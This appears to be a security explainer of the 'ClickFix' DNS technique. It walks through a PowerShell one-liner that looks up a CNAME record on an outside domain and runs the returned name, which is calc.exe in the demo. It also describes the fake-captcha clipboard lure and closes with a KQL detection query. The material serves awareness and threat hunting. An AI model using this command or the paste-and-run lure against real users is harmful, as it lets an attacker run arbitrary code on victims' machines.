Clickfix DNS

Execute commands via DNS CNAME records. The payload is fetched at runtime; no hardcoded commands in the script.

This command runs on Windows
Example Command breakdown
Hover over highlighted segments to see what each part does.
powershell -c "& (Resolve-DnsName clickfix-dns.intel.cx -Type CNAME).NameHost.TrimEnd('.')"
1Invoke PowerShell

Runs PowerShell and passes the following string as a single command to execute.

powershell -c 
2Call operator

The & (call) operator executes whatever the expression in parentheses returns. The opening quote starts the command string.

"& 
3DNS CNAME lookup

Resolves the CNAME record for the domain. The record points to the payload (e.g. calc.exe).

(Resolve-DnsName clickfix-dns.intel.cx -Type CNAME)
4Extract target

Gets the CNAME target from the DNS result: the hostname the record points to (e.g. calc.exe.).

.NameHost
5Clean and close

Removes the trailing dot from the DNS response (FQDN format) to get a valid executable name, then closes the command string.

.TrimEnd('.')"
How it works
The attack chain from victim execution to payload delivery
  1. 1

    Victim runs the command

    The powershell -c one-liner is presented on a fake “support” or “fix” page, The page usually copies the command to the clipboard in the background, then prompts the victim to press Win+R (opens the Run dialog), Ctrl+V (pastes), and Enter (executes the command).

  2. 2

    DNS CNAME lookup

    Resolve-DnsName clickfix-dns.intel.cx -Type CNAME performs a DNS lookup. The CNAME record in this example points to calc.exe.

  3. 3

    Extract and execute

    .NameHost and .TrimEnd('.') extract calc.exe. The & call operator executes it, launching Calculator.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks online. A fake reCAPTCHA-style prompt feels familiar and trustworthy, lowering suspicion.
  • No hardcoded payload. The command contains no executable, script, or URL, only a domain name. Static analysis and signatures miss it.
  • Flexible execution. The DNS record can point to anything on the victim's machine (e.g. calc.exe, PowerShell, a script path) or to another host. The attacker decides at DNS level.
  • Attacker-controlled at any time. Change the CNAME record and the same command now delivers a different payload. No need to redistribute links or documents.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for PowerShell DNS CNAME execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "Resolve-DnsName"
  and ProcessCommandLine contains "-Type"
  and ProcessCommandLine contains "CNAME"
  and ProcessCommandLine contains "NameHost"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine